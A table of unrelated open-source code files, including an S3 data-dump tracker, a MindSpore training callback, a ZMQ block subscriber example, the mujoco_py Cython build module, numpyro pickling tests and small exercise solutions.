filename | text
---|---
the-stack_0_25854
|
"""
tracker.py
"""
import logging
import json
from datetime import datetime
import pytz
import boto3
from .clubhouse import Config
class Tracker:
S3_BUCKET = Config.config_to_dict(Config.load_config(), "S3", "bucket")
def data_dump(self, dump, source, channel=""):
log = f"Dumped {source} {channel}"
if source == "feed":
key = source
elif source == "channel":
key = f"channel_{dump.get('channel')}"
elif source == "channel_dict":
key = f"channel_{dump.get('channel_info').get('channel')}"
elif source == 'join':
key = f"join_{dump.get('channel')}"
else:
key = "unrecognized"
log = f"Unrecognized dumping source {source}"
logging.info(log)
response = self.s3_client_dump(dump, key)
return response
def s3_client_dump(self, dump, key):
"""
Serialize the dump (JSON-encoding dicts) and upload it to the configured S3 bucket under a timestamped key.
:param dump: The server data to be dumped
:type dump: any
:param key: A label for the dump file
:type key: str
:return: The value of the "success" key from the S3 client response (None if absent)
:rtype: any
"""
if isinstance(dump, dict):
dump = json.dumps(dump)
s3_client = boto3.client("s3")
bucket = self.S3_BUCKET
timestamp = datetime.now(pytz.timezone('UTC')).isoformat()
key = f"{key}_{timestamp}.json"
run = s3_client.put_object(
Body=dump,
Bucket=bucket,
Key=key,
)
response = run.get("success")
logging.info(run)
return response
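# A minimal usage sketch (an assumption, not part of the original module): it presumes
# AWS credentials and the clubhouse S3 bucket config are in place so boto3 can reach the
# bucket, and that the module is imported from within its package (relative import above).
def _example_dump():  # hypothetical helper, for illustration only
    tracker = Tracker()
    # With source="channel" the object key becomes "channel_abc123_<timestamp>.json"
    return tracker.data_dump({"channel": "abc123", "users": []}, source="channel")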
|
the-stack_0_25856
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""History Callback class."""
import numpy as np
from mindspore.common.tensor import Tensor
from ._callback import Callback
class History(Callback):
"""
Records the network outputs information into a `History` object.
The recorded network output information will be the loss value if the train or eval network is not customized;
if the customized network returns a `Tensor` or `numpy.ndarray`, the mean value of the network output
will be recorded; if the customized network returns a `tuple` or `list`, the first element of the network
outputs will be recorded.
Note:
Normally used in `mindspore.Model.train`.
Examples:
>>> import numpy as np
>>> from mindspore import Model, nn
>>> from mindspore import dataset as ds
>>> data = {"x": np.float32(np.random.rand(64, 10)), "y": np.random.randint(0, 5, (64,))}
>>> train_dataset = ds.NumpySlicesDataset(data=data).batch(32)
>>> net = nn.Dense(10, 5)
>>> crit = nn.SoftmaxCrossEntropyWithLogits(sparse=True, reduction='mean')
>>> opt = nn.Momentum(net.trainable_params(), 0.01, 0.9)
>>> history_cb = History()
>>> model = Model(network=net, optimizer=opt, loss_fn=crit, metrics={"recall"})
>>> model.train(2, train_dataset, callbacks=[history_cb])
>>> print(history_cb.epoch)
[1, 2]
>>> print(history_cb.history)
{'net_output': [1.607877, 1.6033841]}
"""
def __init__(self):
super(History, self).__init__()
self.history = {}
def begin(self, run_context):
"""
Initialize the `epoch` property at the beginning of training.
Args:
run_context (RunContext): Context of the `mindspore.Model.train/eval`.
"""
self.epoch = []
def epoch_end(self, run_context):
"""
Records the first element of network outputs at the end of each epoch.
Args:
run_context (RunContext): Context of the `mindspore.Model.train/eval`.
"""
cb_params = run_context.original_args()
epoch = cb_params.get("cur_epoch_num", 1)
self.epoch.append(epoch)
net_output = cb_params.net_outputs
if isinstance(net_output, (tuple, list)):
if isinstance(net_output[0], Tensor) and isinstance(net_output[0].asnumpy(), np.ndarray):
net_output = net_output[0]
if isinstance(net_output, Tensor) and isinstance(net_output.asnumpy(), np.ndarray):
net_output = np.mean(net_output.asnumpy())
metrics = cb_params.get("metrics")
cur_history = {"net_output": net_output}
if metrics:
cur_history.update(metrics)
for k, v in cur_history.items():
self.history.setdefault(k, []).append(v)
|
the-stack_0_25859
|
from typing import List
import numpy as np
import tensorflow as tf
from tensorflow.keras.preprocessing.sequence import pad_sequences
from config import cfg
def mask_text_box(
fake_images: tf.float32, input_words: tf.int32, char_width: int
) -> tf.float32:
"""
Masks the text boxes outputted by the generator, in the cases where the length of the word is less than
cfg.max_char_number. Since each character is supposed to take 1/cfg.max_char_number of the width of the text box,
this function masks the extra width.
Parameters
----------
fake_images: Text boxes generated with our model.
input_words: Integer sequences obtained from the input words (initially strings) using the MAIN_CHAR_VECTOR.
char_width: Width of a single character.
Returns
-------
Masked fake_images
"""
mask = tf.tile(
tf.expand_dims(
tf.expand_dims(
tf.repeat(
tf.where(input_words == 0, 0.0, 1.0),
repeats=tf.tile([char_width], [tf.shape(input_words)[1]]),
axis=1,
),
1,
),
1,
),
[1, fake_images.shape[1], fake_images.shape[2], 1],
)
return fake_images * mask
def generator_output_to_uint8(fake_images: tf.float32) -> tf.uint8:
"""
Converts the output of the generator to uint8 RGB images.
Parameters
----------
fake_images: Text boxes generated with our model.
Returns
-------
Generated text boxes in a uint8 RGB format.
"""
fake_images = (tf.clip_by_value(fake_images, -1.0, 1.0) + 1.0) * 127.5
fake_images = tf.transpose(fake_images, perm=[0, 2, 3, 1])
return tf.cast(fake_images, tf.uint8)
def string_to_main_int_sequence(words_list: List[str]) -> np.ndarray:
"""
Converts input strings to integer sequences using the main character vector, and pads them if their length is less
than cfg.max_char_number.
Parameters
----------
words_list: List of words to generate
Returns
-------
Integer sequences obtained from the input words (initially strings) using the MAIN_CHAR_VECTOR.
"""
int_sequence = cfg.char_tokenizer.main.texts_to_sequences(words_list)
# First element is 1, so subtract 1 from each element to match the embedding shape
return (
pad_sequences(int_sequence, maxlen=cfg.max_char_number, value=1, padding="post")
- 1
)
def string_to_aster_int_sequence(words_list: List[str]) -> np.ndarray:
"""
Converts input strings to integer sequences using aster's character vector, and pads them if their length is less
than cfg.max_char_number.
Parameters
----------
words_list: List of words to generate
Returns
-------
Integer sequences obtained from the input words (initially strings) using the ASTER_CHAR_VECTOR.
"""
int_sequence = cfg.char_tokenizer.aster.texts_to_sequences(words_list)
return pad_sequences(
int_sequence, maxlen=cfg.max_char_number, value=1, padding="post"
)
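# A small usage sketch (an assumption, for illustration only): generator outputs are
# assumed to be channels-first float images in [-1, 1]; the helper rescales them to
# [0, 255] and moves channels last. The shape below is made up.
if __name__ == "__main__":
    fake = tf.random.uniform((2, 3, 64, 256), minval=-1.0, maxval=1.0)  # (batch, C, H, W)
    print(generator_output_to_uint8(fake).shape)  # -> (2, 64, 256, 3), dtype uint8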
|
the-stack_0_25860
|
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
ZMQ example using python3's asyncio
Vitalcoin should be started with the command line arguments:
vitalcoind -testnet -daemon \
-zmqpubhashblock=tcp://127.0.0.1:28332 \
-zmqpubrawtx=tcp://127.0.0.1:28332 \
-zmqpubhashtx=tcp://127.0.0.1:28332 \
-zmqpubrawblock=tcp://127.0.0.1:28332
We use the asyncio library here. `self.handle()` installs itself as a
future at the end of the function. Since it never returns with the event
loop having an empty stack of futures, this creates an infinite loop. An
alternative is to wrap the contents of `handle` inside `while True`.
The `@asyncio.coroutine` decorator and the `yield from` syntax found here
were introduced in Python 3.4 and have since been deprecated in favor of the `async`
and `await` keywords respectively.
A blocking example using python 2.7 can be obtained from the git history:
https://github.com/vitalcoin/vitalcoin/blob/37a7fe9e440b83e2364d5498931253937abe9294/contrib/zmq/zmq_sub.py
"""
import binascii
import asyncio
import zmq
import zmq.asyncio
import signal
import struct
import sys
if not (sys.version_info.major >= 3 and sys.version_info.minor >= 4):
print("This example only works with Python 3.4 and greater")
exit(1)
port = 28332
class ZMQHandler():
def __init__(self):
self.loop = zmq.asyncio.install()
self.zmqContext = zmq.asyncio.Context()
self.zmqSubSocket = self.zmqContext.socket(zmq.SUB)
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashblock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashtx")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawblock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawtx")
self.zmqSubSocket.connect("tcp://127.0.0.1:%i" % port)
@asyncio.coroutine
def handle(self) :
msg = yield from self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
sequence = "Unknown"
if len(msg[-1]) == 4:
msgSequence = struct.unpack('<I', msg[-1])[-1]
sequence = str(msgSequence)
if topic == b"hashblock":
print('- HASH BLOCK ('+sequence+') -')
print(binascii.hexlify(body))
elif topic == b"hashtx":
print('- HASH TX ('+sequence+') -')
print(binascii.hexlify(body))
elif topic == b"rawblock":
print('- RAW BLOCK HEADER ('+sequence+') -')
print(binascii.hexlify(body[:80]))
elif topic == b"rawtx":
print('- RAW TX ('+sequence+') -')
print(binascii.hexlify(body))
# schedule ourselves to receive the next message
asyncio.ensure_future(self.handle())
def start(self):
self.loop.add_signal_handler(signal.SIGINT, self.stop)
self.loop.create_task(self.handle())
self.loop.run_forever()
def stop(self):
self.loop.stop()
self.zmqContext.destroy()
daemon = ZMQHandler()
daemon.start()
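# A sketch (an assumption, for illustration) of the `while True` alternative mentioned in
# the module docstring, written with the modern async/await syntax; it would replace the
# self-rescheduling handle() coroutine above:
#
#     async def handle(self):
#         while True:
#             msg = await self.zmqSubSocket.recv_multipart()
#             topic, body = msg[0], msg[1]
#             ...  # same topic dispatch as above, without re-scheduling at the end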
|
the-stack_0_25865
|
"""
Copyright 2020 David Lenwell, Judo Security inc
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import ipaddress
import status
from httpx import exceptions
from functools import wraps
from exceptions import (
AuthError, ClientConnectionError, ClientError, NotFoundError, ServerError
)
logger = logging.getLogger(__name__)
def validate_ip_list(ip_list):
"""validate_ip_list
"""
invalid_list = []
for candidate in ip_list:
if not validate_ip(candidate):
invalid_list.append(candidate)
if len(invalid_list):
return(False, invalid_list)
return(True, invalid_list)
def validate_ip(ip):
"""validate_ip
"""
try:
ip = ipaddress.ip_address(ip)
except ValueError:
return(False)
return(True)
def validate_response(response):
"""validate_response
"""
error_suffix = " response={!r}".format(response)
if response.status_code in (status.HTTP_401_UNAUTHORIZED,
status.HTTP_403_FORBIDDEN):
raise AuthError("operation=auth_error," + error_suffix, response)
if response.status_code == status.HTTP_404_NOT_FOUND:
raise NotFoundError(
"operation=not_found_error," + error_suffix, response
)
if status.is_client_error(code=response.status_code):
raise ClientError("operation=client_error," + error_suffix, response)
if status.is_server_error(code=response.status_code):
raise ServerError("operation=server_error," + error_suffix, response)
def validate_input(f):
@wraps(f)
def wrapper(*args, **kwargs):
try:
response = f(*args, **kwargs)
except (exceptions.TimeoutException,) as exc:
logger.exception(exc)
raise ClientConnectionError() from exc
validate_response(response)
return response
return wrapper
def handle_request_error(f):
@wraps(f)
def wrapper(*args, **kwargs):
try:
response = f(*args, **kwargs)
except (exceptions.TimeoutException,) as exc:
logger.exception(exc)
raise ClientConnectionError() from exc
validate_response(response)
return response
return wrapper
def handle_async_request_error(f):
async def wrapper(*args, **kwargs):
try:
response = await f(*args, **kwargs)
except (exceptions.TimeoutException,) as exc:
logger.exception(exc)
raise ClientConnectionError() from exc
validate_response(response)
return response
return wrapper
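# A minimal usage sketch (an assumption, not part of the original module): `fetch_widget`
# and its URL layout are hypothetical; it only illustrates wrapping an httpx call so that
# timeouts become ClientConnectionError and 4xx/5xx responses raise the typed errors above.
import httpx

@handle_request_error
def fetch_widget(base_url, widget_id):
    # The decorator passes the returned response through validate_response().
    return httpx.get("{}/widgets/{}".format(base_url, widget_id))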
|
the-stack_0_25866
|
# Solution to [Introduction to Sets](https://www.hackerrank.com/challenges/py-introduction-to-sets)
def average(array):
"""Returns the average of distinct heights."""
unique_vals = set(array)
return sum(unique_vals) / len(unique_vals)
# your code goes here
if __name__ == '__main__':
n = int(input())
arr = list(map(int, input().split()))
result = average(arr)
print(result)
|
the-stack_0_25867
|
import distutils
import os
import shutil
import sys
from distutils.core import Extension
from distutils.dist import Distribution
from distutils.sysconfig import customize_compiler
from os.path import abspath, dirname, exists, join, getmtime
from random import choice
from shutil import move
from string import ascii_lowercase
from importlib.machinery import ExtensionFileLoader
import glob
import numpy as np
from cffi import FFI
from Cython.Build import cythonize
from Cython.Distutils.old_build_ext import old_build_ext as build_ext
from mujoco_py.version import get_version
import subprocess
from mujoco_py.utils import discover_mujoco
def get_nvidia_lib_dir():
exists_nvidia_smi = subprocess.call("type nvidia-smi", shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
if not exists_nvidia_smi:
return None
docker_path = '/usr/local/nvidia/lib64'
if exists(docker_path):
return docker_path
paths = glob.glob('/usr/lib/nvidia-[0-9][0-9][0-9]')
paths = sorted(paths)
if len(paths) == 0:
return None
if len(paths) > 1:
print("Choosing the latest nvidia driver: %s, among %s" % (paths[-1], str(paths)))
return paths[-1]
def load_cython_ext(mjpro_path):
"""
Loads the cymj Cython extension. This is safe to be called from
multiple processes running on the same machine.
Cython only gives us back the raw path, regardless of whether
it found a cached version or actually compiled. Since we do
non-idempotent postprocessing of the DLL, be extra careful
to only do that once and then atomically move to the final
location.
"""
if ('glfw' in sys.modules and
'mujoco' in abspath(sys.modules["glfw"].__file__)):
print('''
WARNING: Existing glfw python module detected!
MuJoCo comes with its own version of GLFW, so it's preferable to use that one.
The easy solution is to `import mujoco_py` _before_ `import glfw`.
''')
lib_path = os.path.join(mjpro_path, "bin")
if sys.platform == 'darwin':
Builder = MacExtensionBuilder
elif sys.platform == 'linux':
_ensure_set_env_var("LD_LIBRARY_PATH", lib_path)
if os.getenv('MUJOCO_PY_FORCE_CPU') is None and get_nvidia_lib_dir() is not None:
_ensure_set_env_var("LD_LIBRARY_PATH", get_nvidia_lib_dir())
Builder = LinuxGPUExtensionBuilder
else:
Builder = LinuxCPUExtensionBuilder
elif sys.platform.startswith("win"):
var = "PATH"
if var not in os.environ or lib_path not in os.environ[var].split(";"):
raise Exception("Please add mujoco library to your PATH:\n"
"set %s=%s;%%%s%%" % (var, lib_path, var))
Builder = WindowsExtensionBuilder
else:
raise RuntimeError("Unsupported platform %s" % sys.platform)
builder = Builder(mjpro_path)
cext_so_path = builder.get_so_file_path()
if exists(cext_so_path):
try:
return load_dynamic_ext('cymj', cext_so_path)
except ImportError:
print("Import error. Trying to rebuild mujoco_py.")
cext_so_path = builder.build()
return load_dynamic_ext('cymj', cext_so_path)
def _ensure_set_env_var(var_name, lib_path):
paths = os.environ.get(var_name, "").split(":")
paths = [os.path.abspath(path) for path in paths]
if lib_path not in paths:
raise Exception("\nMissing path to your environment variable. \n"
"Current values %s=%s\n"
"Please add following line to .bashrc:\n"
"export %s=$%s:%s" % (var_name, os.environ.get(var_name, ""),
var_name, var_name, lib_path))
def load_dynamic_ext(name, path):
''' Load compiled shared object and return as python module. '''
loader = ExtensionFileLoader(name, path)
return loader.load_module()
class custom_build_ext(build_ext):
"""
Custom build_ext to suppress the "-Wstrict-prototypes" warning.
It arises from the fact that we're using C++. This seems to be
the cleanest way to get rid of the extra flag.
See http://stackoverflow.com/a/36293331/248400
"""
def build_extensions(self):
customize_compiler(self.compiler)
try:
self.compiler.compiler_so.remove("-Wstrict-prototypes")
except (AttributeError, ValueError):
pass
build_ext.build_extensions(self)
def fix_shared_library(so_file, name, library_path):
''' Used to fixup shared libraries on Linux '''
subprocess.check_call(['patchelf', '--remove-rpath', so_file])
ldd_output = subprocess.check_output(['ldd', so_file]).decode('utf-8')
if name in ldd_output:
subprocess.check_call(['patchelf', '--remove-needed', name, so_file])
subprocess.check_call(['patchelf', '--add-needed', library_path, so_file])
def manually_link_libraries(mjpro_path, raw_cext_dll_path):
''' Used to fix mujoco library linking on Mac '''
root, ext = os.path.splitext(raw_cext_dll_path)
final_cext_dll_path = root + '_final' + ext
# If someone else already built the final DLL, don't bother
# recreating it here, even though this should still be idempotent.
if (exists(final_cext_dll_path) and
getmtime(final_cext_dll_path) >= getmtime(raw_cext_dll_path)):
return final_cext_dll_path
tmp_final_cext_dll_path = final_cext_dll_path + '~'
shutil.copyfile(raw_cext_dll_path, tmp_final_cext_dll_path)
mj_bin_path = join(mjpro_path, 'bin')
# Fix the rpath of the generated library -- i lost the Stackoverflow
# reference here
from_mujoco_path = '@executable_path/libmujoco150.dylib'
to_mujoco_path = '%s/libmujoco150.dylib' % mj_bin_path
subprocess.check_call(['install_name_tool',
'-change',
from_mujoco_path,
to_mujoco_path,
tmp_final_cext_dll_path])
from_glfw_path = 'libglfw.3.dylib'
to_glfw_path = os.path.join(mj_bin_path, 'libglfw.3.dylib')
subprocess.check_call(['install_name_tool',
'-change',
from_glfw_path,
to_glfw_path,
tmp_final_cext_dll_path])
os.rename(tmp_final_cext_dll_path, final_cext_dll_path)
return final_cext_dll_path
class MujocoExtensionBuilder():
CYMJ_DIR_PATH = abspath(dirname(__file__))
def __init__(self, mjpro_path):
self.mjpro_path = mjpro_path
python_version = str(sys.version_info.major) + str(sys.version_info.minor)
self.version = '%s_%s_%s' % (get_version(), python_version, self.build_base())
self.extension = Extension(
'mujoco_py.cymj',
sources=[join(self.CYMJ_DIR_PATH, "cymj.pyx")],
include_dirs=[
self.CYMJ_DIR_PATH,
join(mjpro_path, 'include'),
np.get_include(),
],
libraries=['mujoco150'],
library_dirs=[join(mjpro_path, 'bin')],
extra_compile_args=[
'-fopenmp', # needed for OpenMP
'-w', # suppress numpy compilation warnings
],
extra_link_args=['-fopenmp'],
language='c')
def build(self):
built_so_file_path = self._build_impl()
new_so_file_path = self.get_so_file_path()
move(built_so_file_path, new_so_file_path)
return new_so_file_path
def build_base(self):
return self.__class__.__name__.lower()
def _build_impl(self):
dist = Distribution({
"script_name": None,
"script_args": ["build_ext"]
})
dist.ext_modules = cythonize([self.extension])
dist.include_dirs = []
dist.cmdclass = {'build_ext': custom_build_ext}
build = dist.get_command_obj('build')
# following the convention of cython's pyxbuild and naming
# base directory "_pyxbld"
build.build_base = join(self.CYMJ_DIR_PATH, 'generated',
'_pyxbld_%s' % (self.version))
dist.parse_command_line()
obj_build_ext = dist.get_command_obj("build_ext")
dist.run_commands()
built_so_file_path, = obj_build_ext.get_outputs()
return built_so_file_path
def get_so_file_path(self):
dir_path = abspath(dirname(__file__))
python_version = str(sys.version_info.major) + str(sys.version_info.minor)
return join(dir_path, "generated", "cymj_%s.so" % self.version)
class WindowsExtensionBuilder(MujocoExtensionBuilder):
def __init__(self, mjpro_path):
super().__init__(mjpro_path)
os.environ["PATH"] += ";" + join(mjpro_path, "bin")
self.extension.sources.append(self.CYMJ_DIR_PATH + "/gl/dummyshim.c")
class LinuxCPUExtensionBuilder(MujocoExtensionBuilder):
def __init__(self, mjpro_path):
super().__init__(mjpro_path)
self.extension.sources.append(
join(self.CYMJ_DIR_PATH, "gl", "osmesashim.c"))
self.extension.libraries.extend(['glewosmesa', 'OSMesa', 'GL'])
self.extension.runtime_library_dirs = [join(mjpro_path, 'bin')]
def _build_impl(self):
so_file_path = super()._build_impl()
# Removes absolute paths to libraries. Allows for dynamic loading.
fix_shared_library(so_file_path, 'libmujoco150.so', 'libmujoco150.so')
fix_shared_library(so_file_path, 'libglewosmesa.so', 'libglewosmesa.so')
return so_file_path
class LinuxGPUExtensionBuilder(MujocoExtensionBuilder):
def __init__(self, mjpro_path):
super().__init__(mjpro_path)
self.extension.sources.append(self.CYMJ_DIR_PATH + "/gl/eglshim.c")
self.extension.include_dirs.append(self.CYMJ_DIR_PATH + '/vendor/egl')
self.extension.libraries.extend(['glewegl'])
self.extension.runtime_library_dirs = [join(mjpro_path, 'bin')]
def _build_impl(self):
so_file_path = super()._build_impl()
fix_shared_library(so_file_path, 'libOpenGL.so', 'libOpenGL.so.0')
fix_shared_library(so_file_path, 'libEGL.so', 'libEGL.so.1')
fix_shared_library(so_file_path, 'libmujoco150.so', 'libmujoco150.so')
fix_shared_library(so_file_path, 'libglewegl.so', 'libglewegl.so')
return so_file_path
class MacExtensionBuilder(MujocoExtensionBuilder):
def __init__(self, mjpro_path):
super().__init__(mjpro_path)
self.extension.sources.append(self.CYMJ_DIR_PATH + "/gl/dummyshim.c")
self.extension.libraries.extend(['glfw.3'])
self.extension.define_macros = [('ONMAC', None)]
self.extension.runtime_library_dirs = [join(mjpro_path, 'bin')]
def _build_impl(self):
# Prefer GCC 6 for now since GCC 7 may behave differently.
c_compilers = ['/usr/local/bin/gcc-6', '/usr/local/bin/gcc-7']
available_c_compiler = None
for c_compiler in c_compilers:
if distutils.spawn.find_executable(c_compiler) is not None:
available_c_compiler = c_compiler
break
if available_c_compiler is None:
raise RuntimeError(
'Could not find GCC 6 or GCC 7 executable.\n\n'
'HINT: On OS X, install GCC 6 with '
'`brew install gcc --without-multilib`.')
os.environ['CC'] = available_c_compiler
so_file_path = super()._build_impl()
del os.environ['CC']
return manually_link_libraries(self.mjpro_path, so_file_path)
class MujocoException(Exception):
pass
def user_warning_raise_exception(warn_bytes):
'''
User-defined warning callback, which is called by mujoco on warnings.
Here we have two primary jobs:
- Detect known warnings and suggest fixes (with code)
- Decide whether to raise an Exception and raise if needed
More cases should be added as we find new failures.
'''
# TODO: look through test output to see MuJoCo warnings to catch
# and recommend. Also fix those tests
warn = warn_bytes.decode() # Convert bytes to string
if 'Pre-allocated constraint buffer is full' in warn:
raise MujocoException(warn + 'Increase njmax in mujoco XML')
if 'Pre-allocated contact buffer is full' in warn:
raise MujocoException(warn + 'Increase njconmax in mujoco XML')
raise MujocoException('Got MuJoCo Warning: {}'.format(warn))
def user_warning_ignore_exception(warn_bytes):
pass
class ignore_mujoco_warnings:
"""
Class to turn off mujoco warning exceptions within a scope. Useful for
large, vectorized rollouts.
"""
def __enter__(self):
self.prev_user_warning = cymj.get_warning_callback()
cymj.set_warning_callback(user_warning_ignore_exception)
return self
def __exit__(self, type, value, traceback):
cymj.set_warning_callback(self.prev_user_warning)
def build_fn_cleanup(name):
'''
Cleanup files generated by building callback.
Set the MUJOCO_PY_DEBUG_FN_BUILDER environment variable to disable cleanup.
'''
if not os.environ.get('MUJOCO_PY_DEBUG_FN_BUILDER', False):
for f in glob.glob(name + '*'):
try:
os.remove(f)
except PermissionError as e:
# This happens trying to remove libraries on appveyor
print('Error removing {}, continuing anyway: {}'.format(f, e))
def build_callback_fn(function_string, userdata_names=[]):
'''
Builds a C callback function and returns a function pointer int.
function_string : str
This is a string of the C function to be compiled
userdata_names : list or tuple
This is an optional list used to define convenience names
We compile and link and load the function, and return a function pointer.
See `MjSim.set_substep_callback()` for an example use of these callbacks.
The callback function should match the signature:
void fun(const mjModel *m, mjData *d);
Here's an example function_string:
```
"""
#include <stdio.h>
void fun(const mjModel* m, mjData* d) {
printf("hello");
}
"""
```
Input and output for the function pass through userdata in the data struct:
```
"""
void fun(const mjModel* m, mjData* d) {
d->userdata[0] += 1;
}
"""
```
`userdata_names` is expected to match the model where the callback is used.
These can be set on a model with:
`model.set_userdata_names([...])`
If `userdata_names` is supplied, convenience `#define`s are added for each.
For example:
`userdata_names = ['my_sum']`
will be generated into the extra line:
`#define my_sum d->userdata[0]`
And prepended to the top of the function before compilation.
Here's an example that takes advantage of this:
```
"""
void fun(const mjModel* m, mjData* d) {
for (int i = 0; i < m->nu; i++) {
my_sum += d->ctrl[i];
}
}
"""
```
Note these are just C `#define`s and are limited in how they can be used.
After compilation, the built library containing the function is loaded
into memory and all of the files (including the library) are deleted.
To retain these for debugging set the `MUJOCO_PY_DEBUG_FN_BUILDER` envvar.
To save time compiling, these function pointers may be re-used by many
different consumers. They are thread-safe and don't acquire the GIL.
See the file `tests/test_substep.py` for additional examples,
including an example which iterates over contacts to compute penetrations.
'''
assert isinstance(userdata_names, (list, tuple)), \
'invalid userdata_names: {}'.format(userdata_names)
ffibuilder = FFI()
ffibuilder.cdef('extern uintptr_t __fun;')
name = '_fn_' + ''.join(choice(ascii_lowercase) for _ in range(15))
source_string = '#include <mujoco.h>\n'
# Add defines for each userdata to make setting them easier
for i, data_name in enumerate(userdata_names):
source_string += '#define {} d->userdata[{}]\n'.format(data_name, i)
source_string += function_string
source_string += '\nuintptr_t __fun = (uintptr_t) fun;'
# Link against mujoco so we can call mujoco functions from within callback
ffibuilder.set_source(name, source_string,
include_dirs=[join(mjpro_path, 'include')],
library_dirs=[join(mjpro_path, 'bin')],
libraries=['mujoco150'])
# Catch compilation exceptions so we can cleanup partial files in that case
try:
library_path = ffibuilder.compile(verbose=True)
except Exception as e:
build_fn_cleanup(name)
raise e
# On Mac the MuJoCo library is linked strangely, so we have to fix it here
if sys.platform == 'darwin':
fixed_library_path = manually_link_libraries(mjpro_path, library_path)
move(fixed_library_path, library_path) # Overwrite with fixed library
module = load_dynamic_ext(name, library_path)
# Now that the module is loaded into memory, we can actually delete it
build_fn_cleanup(name)
return module.lib.__fun
def activate():
functions.mj_activate(key_path)
mjpro_path, key_path = discover_mujoco()
cymj = load_cython_ext(mjpro_path)
# Trick to expose all mj* functions from mujoco in mujoco_py.*
class dict2(object):
pass
functions = dict2()
for func_name in dir(cymj):
if func_name.startswith("_mj"):
setattr(functions, func_name[1:], getattr(cymj, func_name))
# Set user-defined callbacks that raise assertion with message
cymj.set_warning_callback(user_warning_raise_exception)
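# A usage sketch for build_callback_fn (an assumption, based on the docstring above):
# `sim` is a hypothetical MjSim instance whose model reserves at least one userdata slot.
#
#     fn_ptr = build_callback_fn("""
#         void fun(const mjModel* m, mjData* d) {
#             for (int i = 0; i < m->nu; i++) {
#                 my_sum += d->ctrl[i];
#             }
#         }
#         """, userdata_names=['my_sum'])
#     sim.set_substep_callback(fn_ptr)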
|
the-stack_0_25868
|
import numpy
# First process input data
with open('input.txt') as f:
input = f.read().splitlines()
list_of_lines = []
# Parse input: first split into two coordinates, then split into X and Y
for i, line in enumerate(input):
pos1 = input[i].split(' -> ')[0]
pos2 = input[i].split(' -> ')[1]
x1 = int(pos1.split(',')[0])
y1 = int(pos1.split(',')[1])
x2 = int(pos2.split(',')[0])
y2 = int(pos2.split(',')[1])
list_of_lines.append([[x1, y1], [x2, y2]])
def determine_grid_size(list_of_lines):
max_x = 0
max_y = 0
for line in list_of_lines:
for p, pos in enumerate(line):
if line[p][0] > max_x:
max_x = line[p][0]
if line[p][1] > max_y:
max_y = line[p][1]
return [max_x, max_y]
def draw_line_in_matrix(matrix, line):
output = matrix
x1 = line[0][0]
y1 = line[0][1]
x2 = line[1][0]
y2 = line[1][1]
delta_x = x2 - x1
delta_y = y2 - y1
# Vertical line (x is constant, y varies)
if delta_x == 0:
length = delta_y
# Inverted line
inverted = length < 0
if inverted:
length *= -1
for i in range(length + 1):
if inverted:
output[x1][y1 - i] += 1
else:
output[x1][y1 + i] += 1
# Horizontal line (y is constant, x varies)
elif delta_y == 0:
length = delta_x
# Inverted line
inverted = length < 0
if inverted:
length *= -1
for i in range(length + 1):
if inverted:
output[x1 - i][y1] += 1
else:
output[x1 + i][y1] += 1
return(output)
def count_overlaps_in_matrix(matrix):
overlaps = 0
for x, row in enumerate(matrix):
for y, col in enumerate(matrix[x]):
if matrix[x][y] >= 2:
overlaps += 1
return(overlaps)
# Create empty matrix and start drawing lines
matrix = numpy.zeros((determine_grid_size(list_of_lines)[0]+1, determine_grid_size(list_of_lines)[1]+1))
for line in list_of_lines:
matrix = draw_line_in_matrix(matrix, line)
print(count_overlaps_in_matrix(matrix))
|
the-stack_0_25870
|
# Copyright Contributors to the Pyro project.
# SPDX-License-Identifier: Apache-2.0
import pickle
import pytest
from jax import random, test_util
import jax.numpy as jnp
import numpyro
import numpyro.distributions as dist
from numpyro.infer import (
HMC,
HMCECS,
MCMC,
NUTS,
SA,
BarkerMH,
DiscreteHMCGibbs,
MixedHMC,
)
def normal_model():
numpyro.sample("x", dist.Normal(0, 1))
def bernoulli_model():
numpyro.sample("x", dist.Bernoulli(0.5))
def logistic_regression():
data = jnp.arange(10)
x = numpyro.sample("x", dist.Normal(0, 1))
with numpyro.plate("N", 10, subsample_size=2):
batch = numpyro.subsample(data, 0)
numpyro.sample("obs", dist.Bernoulli(logits=x), obs=batch)
@pytest.mark.parametrize("kernel", [BarkerMH, HMC, NUTS, SA])
def test_pickle_hmc(kernel):
mcmc = MCMC(kernel(normal_model), 10, 10)
mcmc.run(random.PRNGKey(0))
pickled_mcmc = pickle.loads(pickle.dumps(mcmc))
test_util.check_close(mcmc.get_samples(), pickled_mcmc.get_samples())
@pytest.mark.parametrize("kernel", [DiscreteHMCGibbs, MixedHMC])
def test_pickle_discrete_hmc(kernel):
mcmc = MCMC(kernel(HMC(bernoulli_model)), 10, 10)
mcmc.run(random.PRNGKey(0))
pickled_mcmc = pickle.loads(pickle.dumps(mcmc))
test_util.check_close(mcmc.get_samples(), pickled_mcmc.get_samples())
def test_pickle_hmcecs():
mcmc = MCMC(HMCECS(NUTS(logistic_regression)), 10, 10)
mcmc.run(random.PRNGKey(0))
pickled_mcmc = pickle.loads(pickle.dumps(mcmc))
test_util.check_close(mcmc.get_samples(), pickled_mcmc.get_samples())
|
the-stack_0_25873
|
# Collaborators (including web sites where you got help: (enter none if you didn't need help)
# https://www.w3schools.com/python/python_operators.asp
